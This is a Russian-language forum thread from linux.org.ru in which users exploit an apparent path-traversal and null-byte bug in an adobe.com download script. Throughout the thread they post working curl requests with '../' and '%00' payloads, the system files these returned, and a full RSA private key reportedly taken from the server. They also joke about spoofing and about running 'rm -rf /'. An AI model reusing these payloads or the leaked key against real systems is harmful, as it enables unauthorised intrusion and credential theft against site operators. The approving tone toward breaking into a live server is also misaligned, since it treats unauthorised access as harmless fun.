LINUX.ORG.RU

1 2
Ответ на: комментарий от vahvarh

А что означает сия строка и как подключиться?
nobody:x:60001:60001:NFS Anonymous Access User:/:

vahvarh ★★★
() 

Торможу. Пооткрывал разные файлы curl. Так не только с passwd можно.

Порадовало:

sikon@lucidfox:~$ curl http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../.
./../../../../..//bin/false%00

#!/usr/bin/sh
#       Copyright (c) 1984, 1986, 1987, 1988, 1989 AT&T
#         All Rights Reserved

#       THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF AT&T
#       The copyright notice above does not evidence any
#       actual or intended publication of such source code.

#ident  "@(#)false.sh   1.6     93/01/11 SMI"   /* SVr4.0 1.3   */
exit 255
sikon@lucidfox:~$

Sikon ★★★
()
Ответ на: комментарий от Lockywolf

>А shadow не грузится...

Хех... ssh_host_{rsa,dsa}_key тоже... А мона было бы даже поспуфить;)

Sectoid ★★★★★
()

Шикарно!

Deleted
()
Ответ на: комментарий от stassats

>И еще. http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../.... . Sun Microsystems Inc. SunOS 5.9 Generic May 2002

Вот что мне выдало:

|-----------------------------------------------------------------| | This system is for the use of authorized users only. | | Individuals using this computer system without authority, or in | | excess of their authority, are subject to having all of their | | activities on this system monitored and recorded by system | | personnel. | | | | In the course of monitoring individuals improperly using this | | system, or in the course of system maintenance, the activities | | of authorized users may also be monitored. | | | | Anyone using this system expressly consents to such monitoring | | and is advised that if such monitoring reveals possible | | evidence of criminal activity, system personnel may provide the | | evidence of such monitoring to law enforcement officials. | |-----------------------------------------------------------------|

ftor
()

доподлинно известно одно - кто-то в конце концов догадается посмотреть исходники самих скриптов и в конце-концов adobe.com превратится в прекрасный бесплатный шелл-сервер.

З.Ы. к слову, дырень эта по инету еще с 26 августа гуляет. Вот талпайопы :)))

gr_buza ★★★★
()
Ответ на: комментарий от anonymous

бугога если открыть этот файл в виндовой кодировке повсюду встречаются странные слова "сикси", "сижси", "сиисика" etc

lester_dev ★★★★★
() автор топика

чувствую бедные адобовцы с удивлением смотрят на растущий график скачивания флеш-плейера

lester_dev ★★★★★
() автор топика

ппц.
/me думало что нулл пойзон баг уже давно-давно не актуален) а тут адоб..

nnkd
()

ентерпрайз вашу мать :)

geek ★★★
()
Ответ на: комментарий от boombick 

Это писец полный:

-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQC+gu/eSRi5ThbYrVQcewZFQc/Kfa8B/gKOKzD98aY9hvNFj3pd
w5kw+dSlOCU78jrGkbP4m0GyNN27zDAQlWPEkmyzrOqBYvLnWFQ2kTzPlMBNt2yd
F5TsXqCJvqbwvTn+ExBxvBQyoYpdjl37sk9cyqqAVtavbx1UL5956EWW5wIDAQAB
AoGATkxUN2CFd8tfWmhKVHY/ioFU3F0xazkxZarctNH3R/xJyYIBgb3dHSLgwZLE
wtF4VJoXhIqSwqI1q3RtILO1T6OioXVRPsHOZZCB0SV+67Qk0/ukm9rftQUJ95Jx
v4oM4pugVZieScQ3eZaShT0JumjMd3+dQybkJx6iHQ9wO1ECQQDywfyHvZ6Oa45X
cjOHIGHBDd3kXyJdVjxljtELO0tv2qPYw6UCAdQxjA5Zit+2tCrOVNZx1Y0woUdH
A7DG0KGpAkEAyOdaM9pXB7Bw5fjuIH5BaZXT1ZgdY90nlnYq00kbZVaj5CS8mTAQ
/brK0dOAM3a0KXP4YXw++WxIV2h+WFnuDwJBAKMgVdjFQ/HCNtFuTU/lI6s97TiT
8Ry1YTqBgNnCS4vraSS1O4Ggxv1QdygWmQRGB2nFOqEd9pWSGrqOsVC4S5kCQQDF
xuOI6mgE3NC3xNB/0msIy4On4UEFn6CqQZg1OeIraBidrwCveZ8weaPS3nh1sWT4
7f7V0V+ZYdzxl5/R0G5HAkAzMm0Rs6TOIuUvKAPH0YWkbzyTNzIsMUlf2plbFko3
KE1w2vwntoaGaZu366ZE9B+GlunvZsR8o0gBtnNc8rur
-----END RSA PRIVATE KEY-----

Lumi ★★★★★
()
Ответ на: комментарий от Lumi 

Тоже прикольно

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../.
./../../../../..//etc//hosts.allow%00

# # Copyright (c) 2002 by Sun Microsystems, Inc. # All rights reserved. # #ident "@(#)hosts.allow 1.3 05/05/27 SMI" # # This file is supplied as part of the Solaris Security Toolkit and # is used to grant access to specific services as part of the Solaris 9 # TCP Wrappers implementation. This file should be customized based # on individual site needs. # ALL: LOCAL sshd: \ 130.248.0.0/255.255.0.0 \ 153.32.0.0/255.255.0.0 \ 10.0.0.0/255.0.0.0 \ 172.16.0.0/255.240.0.0 \ 192.168.0.0/255.255.0.0

ManJak ★★★★★
()

я уж грешным делом подумал, а не honeypot ли это? и не придут ли завтра дяди с удостоверениями?

lester_dev ★★★★★
() автор топика
Ответ на: комментарий от lester_dev

не просто не могут быть админы такими кретинами, не могут

lester_dev ★★★★★
() автор топика
Ответ на: комментарий от ManJak

Ща они скажут, что 100% хакеров с России!

ЛОР-эффект.

ManJak ★★★★★
()

Пару ссылок открыло, а теперь на все: "Site Area Temporarily Unavailable. We're sorry, the site area you've requested is unavailable due to scheduled maintenance. Please try again later."

Лор-эффект? :)

TuxR ★★★★
()
Ответ на: комментарий от TuxR 

Там теперь HTTP-редирект.        

Похоже, прикрыли лавочку. Правда, RSA-ключ таки вытянуть успели :).

Sikon ★★★
()
Ответ на: комментарий от ero-sennin

блин! а я апачевский конфиг в /etc пытался нащупать!

Deleted
()
Ответ на: комментарий от SI

>Кто проболтатся ?

Читай выше, там человек им письмо отписал. В принципе по доброму поступил, а то до завтра там уже и rm -rf / запустили бы...

vyv ★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
1 2
Talks